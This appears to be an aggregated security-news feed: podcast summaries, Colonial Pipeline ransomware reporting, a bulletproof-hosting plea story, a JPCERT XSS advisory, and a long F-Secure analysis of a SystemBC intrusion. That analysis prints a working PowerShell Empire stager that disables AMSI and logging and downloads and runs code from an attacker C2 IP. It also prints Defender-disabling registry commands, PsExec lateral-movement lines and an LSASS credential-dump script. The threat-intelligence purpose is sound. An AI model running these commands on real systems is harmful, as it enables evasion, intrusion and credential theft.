640Kbytes of RAM should be enough for anyone…
Read More
The post Never say never! Warren Buffett caught up in integer overflow error… appeared first on Malware Devil.
This Week in the AppSec News, Mike and John talk: “Find My threat model” with AirTags, Qualcomm modem vuln hits lots of Android, an Exim update patches lots of vulns, measuring hardened binaries, a maturity model for k8s, & more!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://securityweekly.com/asw150
The post AirTags & Threat Models, Qualcomm Modem Vuln, Exim RCE(s), & Binary Hardening – ASW #150 appeared first on Malware Devil.
While the vision for app security is relatively clear, executing on that vision is still somewhat of a work in progress. Fast-moving, interdependent pieces—custom code and open source packages, infrastructure and network configurations, user entitlements—make for complex systems. In this episode, we discuss the challenge in addressing each piece independently and consider how consolidated, multi-purpose tools may present an emerging solution.
This segment is sponsored by Prisma Cloud/ Palo Alto Networks.
Visit https://securityweekly.com/prismacloud to learn more about them!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://securityweekly.com/asw150
The post Delivering On the Promise of Application Security – Ankur Shah – ASW #150 appeared first on Malware Devil.
On May 8, the Colonial Pipeline Company announced that it had fallen victim to a ransomware attack a day earlier. The pipeline operations include transporting 100 million gallons of fuel daily to meet the needs of consumers across the entire eastern seaboard of the U.S. from Texas to New York, according to the website of the refined products pipeline company.
The post Inside the DarkSide Ransomware Attack on Colonial Pipeline appeared first on Security Boulevard.
The post Inside the DarkSide Ransomware Attack on Colonial Pipeline appeared first on Malware Devil.
This Week in the AppSec News, Mike and John talk: “Find My threat model” with AirTags, Qualcomm modem vuln hits lots of Android, an Exim update patches lots of vulns, measuring hardened binaries, a maturity model for k8s, & more!
Visit https://www.securityweekly.com/asw for all the latest episodes!
Show Notes: https://securityweekly.com/asw150
The post AirTags & Threat Models, Qualcomm Modem Vuln, Exim RCE(s), & Binary Hardening – ASW #150 appeared first on Malware Devil.
Are you going to the RSA conference coming up on May 17th to 20th? If so, come join us in talks, workshops, and our developer challenge! Here’s what we are up to at RSA and RSA DevOpsConnect.
Photo by Adam Solomon on Unsplash
Look out for a hands-on lab with me and Suchakra, where we will discuss how code can be represented in a graph, which can then be queried interactively to find bugs. We will show you how to use the open-source tool Joern to hunt for vulnerabilities using interactive static analysis: https://www.rsaconference.com/Library/presentation/USA/2021/findings-stranger-things-in-code.
Time: 3:25 PM to 5:00 PM (EDT), May 20th, 2021.
Chetan Conikee, CTO at ShiftLeft, will be presenting on how to detect malware and insider attacks in your source code. Insider threats are one of today’s most challenging cybersecurity issues. They are also one of the most challenging attack models to deal with in practice and not well addressed by popular security solutions.
In this talk, Chetan will walk through a live forensic code auditing exercise of the Solorigate supply chain insider attack: SUNBURST, SUPERNOVA, and SUNSPOT. He will also discuss malware detection techniques in the early phases of SDLC Software Development Lifecycle.
Time: 6:30 PM to 7:00 PM (EDT), May 20th, 2021.
Finally, Kit Wetzler and Prabhu Subramanian will be presenting on how developing fast and developing securely doesn’t have to contradict.
The demand for engineering security into applications and for automating vulnerability discovery increases with our fast-paced development environment today. The ability to statically identify vulnerabilities comprehensively, efficiently, and with few false positives is an important primitive to achieve. In this presentation, Kit and Prabhu will show you how this can be achieved.
Time: 2:45 PM to 3:00 PM (EDT), May 20th, 2021.
Finally, we will be hosting a booth at the conference (Booth link TBD) on May 19th, where we will be holding a developer security challenge. Stop by our booth to test your skills! Anyone who answers correctly will be entered into a raffle for three SnackMagic boxes!
See you there! Developer-first from the start, ShiftLeft is the code security platform developers love. Powered by our unique Code Property Graph (CPG) technology, the ShiftLeft CORE platform combines static analysis, secrets detection, intelligent SCA, and security education in one easy-to-use solution. Visit us here to find out more:
Thanks for reading! What is the most challenging part of developing secure software for you? I’d love to know. Feel free to connect on Twitter @vickieli7.
ShiftLeft @ RSA was originally published in ShiftLeft Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.
The post ShiftLeft @ RSA appeared first on Security Boulevard.
The post ShiftLeft @ RSA appeared first on Malware Devil.
Colonial Pipeline, which carries 45% of the fuel consumed on the U.S. East Coast, on Saturday said it halted operations due to a ransomware attack, once again demonstrating how infrastructure is vulnerable to cyber attacks.
“On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack,” the company said in a statement posted on its website. “We have since determined that this incident involves ransomware. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems.”
Colonial Pipeline is the largest refined products pipeline in the U.S., a 5,500 mile (8,851 km) system involved in transporting over 100 million gallons from the Texas city of Houston to New York Harbor.
Cybersecurity firm FireEye’s Mandiant incident response division is said to be assisting with the investigation, according to reports from Bloomberg and The Wall Street Journal, with the attack linked to a ransomware strain called DarkSide.
“We are engaged with Colonial and our interagency partners regarding the situation,” the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. “This underscores the threat that ransomware poses to organizations regardless of size or sector. We encourage every organization to take action to strengthen their cybersecurity posture to reduce their exposure to these types of threats.”
An analysis of the ransomware published by Cybereason earlier in April 2021 reveals that DarkSide has a pattern of being used against targets in English-speaking countries, while avoiding entities located in former Soviet Bloc nations.
The operators behind the ransomware also recently switched to an affiliate program in March, wherein threat actors are recruited to spread the malware by breaching corporate network victims, while the core developers take charge of maintaining the malware and payment infrastructure.
DarkSide, which commenced operations in August 2020, has published stolen data from more than 40 victims to date. It’s not immediately clear how much money the attackers demanded or whether Colonial Pipeline has paid. A separate report from Bloomberg alleged that the cybercriminals behind the attack stole 100GB of data from its network.
The latest cyber attack comes as a coalition of government and tech firms in the private sector, called the Ransomware Task Force, released a list of 48 recommendations to detect and disrupt the rising ransomware threat, in addition to helping organizations prepare and respond to such attacks more effectively.
Potentially damaging intrusions targeting utilities and critical infrastructure have witnessed a surge in recent years, fueled in part by ransomware attacks that have increasingly jumped on the double extortion bandwagon to not only encrypt the victim’s data, but exfiltrate the information beforehand and threaten to make it public if the ransom demand is not paid.
Based on data gathered by Check Point and shared with The Hacker News, cyber attacks targeting American utilities increased by 50% on average per week, from 171 at the start of March to 260 towards the end of April. What’s more, over the last nine months, the monthly number of ransomware attacks in the U.S. nearly tripled to 300.
“Furthermore, in recent weeks an average of 1 in every 88 Utilities organization in the U.S. suffered from an attempted Ransomware attack, up by 34% compared to the average from the beginning of 2021,” the American-Israeli cybersecurity firm said.
In February 2020, CISA issued an alert warning of increasing ransomware infections impacting pipeline operations following an attack that hit an unnamed natural gas compression facility in the country, causing the company to shut down its pipeline asset for about two days.
Securing pipeline infrastructure has been an area of focus for the Department of Homeland Security, which in 2018 assigned CISA to oversee what’s called the Pipeline Cybersecurity Initiative (PCI) that aims to identify and address emerging threats and implement security measures to protect more than 2.7 million miles of pipelines responsible for transporting oil and natural gas in the U.S.
The agency’s National Risk Management Center (NRMC) has also published a Pipeline Cybersecurity Resources Library in February 2021 to “provide pipeline facilities, companies, and stakeholders with a set of free, voluntary resources to strengthen their cybersecurity posture.”
Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.
The post Ransomware Cyber Attack Forced the Largest U.S. Fuel Pipeline to Shut Down appeared first on Malware Devil.
Four Eastern European nationals face 20 years in prison for Racketeer Influenced Corrupt Organization (RICO) charges after pleading guilty to providing bulletproof hosting services between 2008 and 2015, which were used by cybercriminals to distribute malware to financial entities across the U.S.
The individuals, Aleksandr Grichishkin, 34, and Andrei Skvortsov, 34, of Russia; Aleksandr
Read More
The post Four Plead Guilty to Aiding Cyber Criminals with Bulletproof Hosting appeared first on Malware Devil.
On the 22nd of February 1943 a brave 21-year-old woman walked to a Nazi guillotine, displaying full conviction she “had done the best I could have done for my people”. This is where her life ended. But how did it begin? Today marks what would have been the 100th birthday of Sophie Scholl. On May … Continue reading This Day in History 1921: Sophie Scholl Was Born
The post This Day in History 1921: Sophie Scholl Was Born appeared first on Security Boulevard.
The post This Day in History 1921: Sophie Scholl Was Born appeared first on Malware Devil.
The post Terminal escape injection in AWS CloudShell appeared first on Malware Devil.
Do we still need World Password Day? Hacking a Tesla via a drone, and a privacy warning about the Ipsos Screenwise panel. ** Links mentioned on the show ** World password day – May 6th https://www.darkreading.com/vulnerabilities—threats/will-2021-mark-the-end-of-world-password-day-/a/d-id/1340911 Tesla Car Hacked Remotely From Drone via Zero-Click Exploit https://www.securityweek.com/tesla-car-hacked-remotely-drone-zero-click-exploit What is this Ipsos/Google Screenwise Panel? (Tom received a […]
The post World Password Day, Tesla Hacking via Drone, Ipsos Screenwise Panel appeared first on The Shared Security Show.
The post World Password Day, Tesla Hacking via Drone, Ipsos Screenwise Panel appeared first on Security Boulevard.
The post World Password Day, Tesla Hacking via Drone, Ipsos Screenwise Panel appeared first on Malware Devil.
A recent Ponemon study found that 71% of IT professionals prefer to use best-of-breed security solutions rather than get all of their security tools from a single vendor. This finding is especially important in the light of recent security architectures, especially SASE and Zero Trust.
The post IT Pros Prefer Best of Breed Security vs. Single Vendor Solutions appeared first on K2io.
The post IT Pros Prefer Best of Breed Security vs. Single Vendor Solutions appeared first on Security Boulevard.
The post IT Pros Prefer Best of Breed Security vs. Single Vendor Solutions appeared first on Malware Devil.
The pandemic forced most businesses globally to transition to remote work. With many people working from home, any semblance of a corporate security perimeter evaporated, increasing demand for virtual private networks (VPNs) and multifactor authentication (MFA) to strengthen an organization’s security posture. Legacy Multifactor Authentication Technology is Flawed Implementing MFA is definitely the right step..
The post Beyond MFA: Adding Context For Secure Access appeared first on Security Boulevard.
The post Beyond MFA: Adding Context For Secure Access appeared first on Malware Devil.
We’re often asked by customers embarking on the SOC 2 journey, “Can we skip the SOC 2 Type 1 and go straight into a Type 2?” They reason that instead of paying for two audits, they would only pay for one. It seems like an easy choice, right? However, this is not a decision to..
The post The Perils of a Running Start: Can You Skip SOC 2 Type 1? appeared first on Security Boulevard.
The post The Perils of a Running Start: Can You Skip SOC 2 Type 1? appeared first on Malware Devil.
Four Eastern European nationals face 20 years in prison for Racketeer Influenced Corrupt Organization (RICO) charges after pleading guilty to providing bulletproof hosting services between 2008 and 2015, which were used by cybercriminals to distribute malware to financial entities across the U.S.
The individuals, Aleksandr Grichishkin, 34, and Andrei Skvortsov, 34, of Russia; Aleksandr Skorodumov, 33, of Lithuania; and Pavel Stassi, 30, of Estonia, have been accused of renting their wares to cybercriminal clients, who used the infrastructure to disseminate malware such as Zeus, SpyEye, Citadel, and the Blackhole Exploit Kit that were capable of co-opting victim machines into a botnet, and stealing sensitive information.
The deployment of malware caused or attempted to cause millions of dollars in losses to U.S. victims, the U.S. Department of Justice (DoJ) said in a statement on Friday.
“A key service provided by the defendants was helping their clients to evade detection by law enforcement and continue their crimes uninterrupted; the defendants did so by monitoring sites used to blocklist technical infrastructure used for crime, moving ‘flagged’ content to new infrastructure, and registering all such infrastructure under false or stolen identities,” the DoJ added.
Founded by Grichishkin and Skvortsov, the latter was also responsible for marketing the organization’s criminal business, with Skorodumov and Stassi acting as the lead systems administrator and taking charge of other administrative tasks, including using stolen personal information to register web hosting and financial accounts.
Bulletproof hosting (BPH), also known as abuse-resistant services, is different from regular web hosting in that it allows a content provider more leniency in the kind of data that can be hosted on those servers, thus making it easier to evade law enforcement. Operators of bulletproof hosting services are known to employ a variety of tricks to stay under the radar, while simultaneously acting as a safe haven with the goal of anonymizing cybercrime operations.
Last December, law enforcement agencies from the US, Germany, Netherlands, Switzerland, France, along with Europol’s European Cybercrime Centre (EC3), took down Safe-Inet, a popular virtual private network (VPN) service that was used to facilitate illicit activity.
Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.
The post Four Plead Guilty to Aiding Cyber Criminals with Bulletproof Hosting appeared first on Malware Devil.
JPCERT-AT-2021-0022
JPCERT/CC
2021-05-10
On May 7, 2021, EC-CUBE CO.,LTD. has released an alert regarding a cross site scripting vulnerability (CVE-2021-20717) in EC-CUBE. By leveraging the vulnerability, a remote attacker may execute arbitrary script on the site administrator’s web browser, resulting in unauthorized access to the vulnerable site or personal information leakage. EC-CUBE CO.,LTD. has confirmed attacks that exploit this vulnerability.
EC-CUBE 4.0.x: Alert Regarding Cross Site Scripting Vulnerability (Japanese)
https://www.ec-cube.net/info/weakness/20210507/
Since attacks that exploit the vulnerability have already been confirmed,users of the affected products are recommended to take measures such as applying patches as soon as possible. For more information, please refer to the information provided by EC-CUBE CO.,LTD..For countermeasures, please consider contacting the contractor in charge of construction of the site as responding to the vulnerability.
Affected products and versions are as follows.
– EC-CUBE version from 4.0.0 to 4.0.5
EC-CUBE CO.,LTD. released a patch and version that address the vulnerability. Please consider applying the patch or version by referring to the information published by EC-CUBE CO.,LTD..
– EC-CUBE version 4.0.5-p1
In addition, for users who customize the original source code of EC-CUBE, the code difference and information on precautions when applying the update have been provided.
Countermeasure method 2: Manually updating by checking the difference (Japanese)
https://www.ec-cube.net/info/weakness/20210507/#diff
EC Cube Co., Ltd. has provided information on how to check if attack exploiting this vulnerability has been performed, which is by checking data within order and member information.
How to check the attack (Japanese)
https://www.ec-cube.net/info/weakness/20210507/#check
EC-CUBE CO.,LTD.
[Important] Request to respond to the vulnerability of “high” urgency in EC-CUBE 4.0 series (updated 2021/5/10 9:00) (2021/05/07) (Japanese)
https://www.ec-cube.net/news/detail.php?news_id=383
EC-CUBE CO.,LTD.
Released “EC-CUBE 4.0.5-p1” that addressed the vulnerability (2021/05/10) (Japanese)
https://www.ec-cube.net/news/detail.php?news_id=384
Japan Vulnerability Notes JVN#97554111
Cross Site Scripting Vulnerability in EC-CUBE (Japanese)
https://jvn.jp/jp/JVN97554111/
If you have any information regarding this alert, please contact JPCERT/CC.
JPCERT Coordination Center (Early Warning Group)
MAIL: ew-info@jpcert.or.jp
https://www.jpcert.or.jp/english/
The post Security Alert: Alert Regarding Cross Site Scripting Vulnerability (CVE-2021-20717) in EC-CUBE appeared first on Malware Devil.
With the weather getting warmer, and vaccinations against COVID-19 increasing, we are likely to see an increase in travel — including international business travel. But for individuals and companies seeking to protect their data privacy, a recent ruling by the United States Court of Appeals for the First Circuit may give rise to concern about..
The post Federal Court Permits Warrantless Device Searches at Border appeared first on Security Boulevard.
The post Federal Court Permits Warrantless Device Searches at Border appeared first on Malware Devil.
In late February 2021, F-Secure’s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands on keyboard crimeware intrusion. The intrusion was stopped before the threat actor could reach their objective, but in recent reporting the use of this malware has been tied to Ransomware activity. F-Secure was also able to identify another recent intrusion conducted by the threat actor where they had deployed Ryuk ransomware.
F-Secure’s analysis of the SystemBC sample identified that this was a new variant of the malware, with several notable differences from previous versions. The sample was executed by a previously undocumented “wrapper”, which F-Secure’s research suggests has been used in combination with multiple malware families common in crimeware intrusions.
This blog shall provide insight in to both the intrusion and the malware sample, so that organizations can be informed to protect themselves from this evolving threat. A detection section is included, which contains actionable takeaways so that organizations can improve their own defenses against this, and similar, threats.
The intrusion began in a third-party IT service provider, which had an un-patched VPN appliance that was vulnerable to remote exploitation. The threat actor was able to extract credentials from this device and then access a host with connectivity to the victim network. The threat actor entered the victim network via a Remote Desktop Protocol (RDP) connection using stolen credentials of an administrator account belonging to that third-party IT service provider.
Figure 1: Initial Access Attack Path
Once the RDP session had connected the threat actor immediately began to enumerate the victim domain and network. With an interactive PowerShell session they used the Windows utilities like net.exe, ping.exe and nltest.exe.
C:WindowsSystem32net.exe group “enterprise admins” /domain
C:WindowsSystem32net.exe user <USER> /domain
C:WindowsSystem32net.exe group “domain admins” /domain
C:WindowsSystem32net.exe group “domain computers” /domain
C:WindowsSystem32nltest.exe /dclist: <DOMAIN>
Figure 2: Enumeration Command Lines
Shortly after this they scanned the network using a portable version of Advanced IP Scanner, a tool popular in crimeware circles. The scanner was used to sweep multiple sub-networks for normal service ports and dynamic ranges.
%USERPROFILE%DownloadsAdvanced_IP_Scanner_2.5.3850.exe
Figure 3: Advanced IP Scanner Path
The scanner was downloaded from the software provider’s website via internet explorer and executed with explorer.exe. F-Secure’s investigation uncovered a forensic artifact that suggests the threat actor was watching a YouTube video on how to use this tool prior to execution.
After initial reconnaissance, the adversary executed a Base64 encoded PowerShell command. The decoded command is included below.
If($PSVERsIONTabLe.PSVERSIoN.MajOR -ge 3){$GPF=[ref].ASsEMBly.GetTypE(‘System.Management.Automation.Utils’).”GeTFIe`lD”(‘cachedGroupPolicySettings’,’N’+’onPublic,Static’);IF($GPF){$GPC=$GPF.GetVALUE($nuLL);If($GPC[‘ScriptB’+’lockLogging’]){$GPC[‘ScriptB’+’lockLogging’][‘EnableScriptB’+’lockLogging’]=0;$GPC[‘ScriptB’+’lockLogging’][‘EnableScriptBlockInvocationLogging’]=0}$vAl=[CoLLectIonS.GenErIc.DICTIONary[String,SYSTEm.OBJECT]]::New();$val.Add(‘EnableScriptB’+’lockLogging’,0);$VAl.ADd(‘EnableScriptBlockInvocationLogging’,0);$GPC[‘HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB’+’lockLogging’]=$VAl}ElSe{[SCripTBLOck].”GEtFiE`lD”(‘signatures’,’N’+’onPublic,Static’).SeTVaLue($nuLL,(New-ObjecT COllEcTiONs.GenERIC.HashSET[StRINg]))}[ReF].ASSeMBly.GEtTyPE(‘System.Management.Automation.AmsiUtils’)|?{$_}|%{$_.GEtFiELd(‘amsiInitFailed’,’NonPublic,Static’).SETValue($NULL,$tRUe)};};[SySTEm.NeT.SERVIcePoINTMaNAGeR]::ExpecT100ContInue=0;$wc=NEw-OBJECt SYstEM.NeT.WEBCLIENT;$u=’Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko’;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HeAdeRS.AdD(‘User-Agent’,$u);$WC.PRoXy=[System.Net.WeBRequest]::DefaULtWeBProXY;$Wc.PrOXY.CRedeNTiALS = [SysTEm.NeT.CrEDeNtIaLCAChe]::DEFAULtNEtwORKCREdENTiALs;$Script:Proxy = $wc.Proxy;$K=[System.TEXt.ENCoding]::ASCII.GEtBYTES(‘b3a9ff9c3041b9841a771013e1ac9f21′);$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXor$S[($S[$I]+$S[$H])%256]}};$ser=’https://193.29.104.187/:443′;$t=’/news.php’;$WC.HeadERs.ADd(“Cookie”,”session=SWk+gWN3HiMjZmI/X/6tsGgRVb4=”);$DatA=$WC.DowNloadData($Ser+$t);$IV=$Data[0..3];$DATa=$DATA[4..$data.LenGth];-jOIn[Char[]](& $R $DaTa ($IV+$K))|IEX
Figure 4: Decoded PowerShell Command
The command is associated with the PowerShell Empire framework and disables ScriptBlock logging and AMSI before connecting out to an external Command and Control (C2) server. The threat actor was using the default version of PowerShell Empire with the following C2 and UserAgent:
C2: https://193.29.104[.]187/news.php
User-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Figure 5: PSE C2 & User Agent
After establishing C2 communication through PowerShell Empire and conducting additional reconnaissance, the actor disabled Windows Defender with multiple registry changes using reg.exe.
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows Defender” /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderMpEngine” /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReal-Time Protection” /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderReporting” /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderSpyNet” /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderSpyNet” /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add “HKLMSoftwarePoliciesMicrosoftWindows DefenderSpyNet” /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg.exe delete “HKLMSoftwarePoliciesMicrosoftWindows Defender” /f
Figure 6: “reg.exe” Command Lines
Immediately after Windows Defender was disabled the actor downloaded an archive from “sendspace[.]com” – an online file sharing platform.
hXXps://fs12n1.sendspace[.]com/dl/2dcbf9eb9e28920a81febd3f0a8cda84/6039c40226878d2e/px2kd3/1.rar
Figure 7: Malicious Archive URL
Once extracted from the archive then the file “Svchost.exe” (2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580) was executed. F-Secure’s analysis shows this file is a new variant of the SystemBC malware family. Full analysis of the malware is included later in this post.
Figure 8: SystemBC Download
With multiple routes of access established to the network the threat actor then downloaded another archive, from the same domain, containing four additional files.
hXXps://fs12n5.sendspace[.]com/dl/5593c4325c0f9c23cb59661893ae9454/6039c46105fab7d4/3dugcw/2.zip
Figure 9: Additional Malicious Archive URL
The files downloaded were stored on a share that was mapped for all hosts on the victim network.
servers0.bat
1.ps1
a.ps1
PsExec.exe
Figure 10: Archive Contents
The first file of interest, servers0.bat, was a batch file that contained a long list of commands to execute the “1.ps1” PowerShell script on multiple hosts using PsExec.exe.
start PsExec.exe -d \<hostname> -u “<username>” -p “<pass>” -accepteula -s cmd /c “powershell.exe -ExecutionPolicy Bypass -file \<share>l.ps1”
start PsExec.exe -d \<hostname> -u “<username>” -p “<pass>$” -accepteula -s cmd /c “powershell.exe -ExecutionPolicy Bypass -file \<share>l.ps1”
start PsExec.exe -d \<hostname> -u “<username>” -p “<pass>$” -accepteula -s cmd /c “powershell.exe -ExecutionPolicy Bypass -file \<share>l.ps1”
start PsExec.exe -d \<hostname> -u “<username>” -p “<pass>$” -accepteula -s cmd /c “powershell.exe -ExecutionPolicy Bypass -file \<share>l.ps1”
…
Figure 11: Truncated Contents of “servers0.bat”
The PowerShell script “1.ps1” would attempt to create a dump of the LSASS process using rundll32.exe in combination with comsvcs.dll. If successful the threat actor would look to extract any credentials stored in the memory of this process using tools such as Mimiktaz.
$computerName = $env:computername;
$procid = Get-Process | Where-Object {$_.ProcessName -eq ‘lsass’} | Select-Object Id
Powershell -c rundll32.exe C:WindowsSystem32comsvcs.dll, MiniDump $procid.Id $Env:TEMP$computerName full
Start-Sleep -s 59
Copy-Item -Path $Env:TEMP$computerName -Destination “\<hostname><share>$($computerName)”
Figure 12: Contents of “1.ps1”
In addition, the threat actor deployed a PowerShell script named “a.ps1” that had the capability to further enumerate hosts across the network. Interestingly the file still had the hostname and domain from a previous intrusion of another victim by the group, which allowed F-Secure to notify that victim of the activity. F-Secure did not see any evidence of the execution of this script despite its creation on victim systems by the threat actor.
$path = “\<hostname>.<domain>s$” + $env:computername;
$OutputVariable = (cmd.exe /c tasklist /v) | Out-File -FilePath “$($path)_task.txt” -Append;
$OutputVariable = (cmd.exe /c arp -a) | Out-File -FilePath “$($path)_arp.txt” -Append;
$OutputVariable = (cmd.exe /c dir C:users) | Out-File -FilePath “$($path)_users.txt” -Append;
Figure 13: Contents of “a.ps1”
The actor was not able to execute any further malicious commands as containment was actioned by the F-Secure MDR service and the victim organization.
File Name: svchost.exe
SHA1: f8af1b293aecdb3d1fe038b4b638f283ee852287
MD5: fa93cfe0898c704551cefdfa193d406f
SHA256: 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580
Path: C:UsersPublicsvchost.exe
Execution Command Line: C:UsersPublicsvchost.exe start
The “svchost.exe” binary is a wrapper that contains an encrypted SystemBC payload. When the wrapper executes, it decrypts the payload and injects it into the memory of a child process. The technique used is commonly known as process hollowing.
All the key APIs of wrapper are resolved at runtime. After the resolution routine, it creates a new process using its own command line. A new child process is then created out of the wrapper disk image.
Figure 14: Process Command Line
The child is launched as suspended, this is done to allow subsequent process injection into the new child process. The wrapper uses NtUnmapViewOfSection to empty the target process memory.
Figure 15: NtUnmapViewOfSection Code
0x7000 bytes of new memory is allocated into the child process with VirtualAllocEx at offset 0x400000 and the permissions of the section are set to PAGE_EXECUTE_READWRITE with flprotect = 0x40. The SystemBC backdoor is then decrypted and injected into the new memory space with WriteProcessMemory.
Figure 16: WriteProcessMemory Code
After the required code is injected, the wrapper finally sets the main thread context in the child to point to the correct entry point 0x1000 and calls ResumeThread on the child process. The use of process hollowing ensures the unpacked malicious code is only visible in the process memory and not the on-disk version of the file.
Figure 17: Wrapper Execution Flow
Pivoting from the debug string found in the wrapper “y:test4e93Debuge93.pdb” we can see multiple other samples, with other payloads such as Bazar Loader. The earliest observed malware sample in F-Secure’s telemetry dates back to December 2019. There were over 300 samples in total that contain a similar PDB path and appear to be the same wrapper. The table below includes a selected few examples.
PDB Path
Compilation Time Stamp
y:test4104Debug104.pdb
2019-12-15 18:02
y:test4a30Debuga30.pdb
2020-08-09 11:58
y:test4e45Debuge45.pdb
2020-09-06 17:07
y:test4e62Debuge62.pdb
2020-12-01 10:43
y:test4e88Debuge88.pdb
2021-01-11 10:19
y:test4e93Debuge93.pdb
2021-02-23 21:32
y:test4e97Debuge97.pdb
2021-03-02 17:55
y:test4e98Debuge98.pdb
2021-03-10 16:07
y:test4e98Debuge98.pdb
2021-03-13 23:22
y:test4e94Debuge94.pdb
2021-03-20 10:16
The PDB paths suggest a single environment is used to compile the malware. This is likely linked to a single malware developer or team. Artifacts within the binaries suggest that the author is Russian speaking, which aligns with F-Secure’s knowledge of the wider crimeware actor who conducted the intrusion.
As reported by Sophos, SystemBC is known as an “off-the-shelf” piece of malware, which is bundled with a TOR client to phone home via the TOR network. In an even earlier version, found by Proofpoint in 2019, the malware was using a SOCKS5 proxy. The SystemBC payload analyzed by F-Secure shares a number of key capabilities with the previously reported samples.
At the first time executing it will create a scheduled task for persistence via a COM interface (CLSID: 148BD52A-A2AB-11CE-B11F-00AA00530503). The scheduled task is created from the wrapper image, named “wow64”, given the “start” argument and scheduled to run every two minutes after the first execution at current time. The CLSID is located in the .data section starting at 0x50C3.
The malware executes files received from the C2 after writing the files out to %TEMP%. It supports execution of EXE, VBS, BAT, CMD and PS1 file types.
Figure 18: C2 Identification Routine
PS1 files will be executed with PowerShell using the parameters “-WindowStyle Hidden -ep bypass -file” and the payload, which is identical to the other public samples analyzed by security researchers. Other file types will be executed via a scheduled task, the same COM interface that is used for its own persistence.
Figure 19: Execution Flow
The sample analyzed by F-Secure also had significant differences to those previously analyzed. The SystemBC payload was smaller than previous 2020 versions, with the size of the unpacked payload being just 28 KB as opposed to the TOR version which is 44 KB. The new version lacked previously observed features such as the TOR client, AV search and binary relocation on disk. The following sections explore those differences in more detail.
When the SystemBC payload F-Secure analyzed is executed, it will search and create a mutex “wow64”. Then it calls sub_402985 to check if the passed command line argument equals to “start”. If the mutex was not found and the file was executed with “start”, it will continue to the sub_401549 to execute the C2 commands.
Figure 20: Initialization Function (New Version)
In the older version of SystemBC, the name of the process will be used as a mutex. The initialization is fairly similar to the new sample with few differences. The old sample will attempt to find the a2guard.exe process, which is linked to an anti-virus product belonging to Emisoft. If the process is found the sample will exit without establishing a persistence. If start argument is missing, the file will be copied into a random directory under ProgramData.
Figure 21: Initialization Function (Old Version)
In both samples, if the “start” argument is missing, a scheduled task will be created from the disk image with “start” argument.
Before SystemBC calls the C2 server, it will collect some basic information from the host.
Username
The Windows build number for the infected system
A WOW process check (32-bit or 64-bit detection)
The voume serial number
Figure 22: RtlGetVersion and IsWow64Process APIs Runtime Resolution (New Version)
In the older version, which has TOR capabilities, the sample is implementing a small TOR client that according to Sophos is likely a C implementation of the open source mini-tor written in C++. The C2 communications are then routed via TOR.
Figure 23: C2 Code (Old Version)
In the newer sample, it is lacking the TOR client code completely and the C2 communications are implemented with sockets over IPV4 TCP protocol and non-standard ports. The XOR routine is called to decrypt the required port number from the .data section inside the binary.
Figure 24: Call WSAStartup and Decrypt Port Number (New Version)
The malware then continues with the C2 connection, decrypting the IP-address with the same XOR function as well as building the required parameters to make a network connection.
Figure 25: C2 IP Decryption & Socket Creation (New Version)
Interestingly throughout the old and new samples, the XOR decryption function at offset 0x2C07 is called multiple times for different strings loaded from the memory of the process. The decryption function is looking at the boundaries of the start of the decryption key and the end of the encrypted data section to determine whether a passed string is located inside it and requires decryption or not.
Figure 26: Decryptor Function
This could suggest that there is support for further obfuscation in SystemBC by encrypting more of the plaintext strings. The XOR decryption key used is 40 bytes long and located at the beginning of a .data section at 0x5000. The C2 details are located immediately after the key.
This kind of XOR function and the configuration have been observed in even older samples from 2019. The new sample analyzed is very similar to previously observed samples in terms of capability, but as discussed above has a different implementation for initialization and C2. The earliest sample of this SystemBC version was observed at the beginning of January 2021.
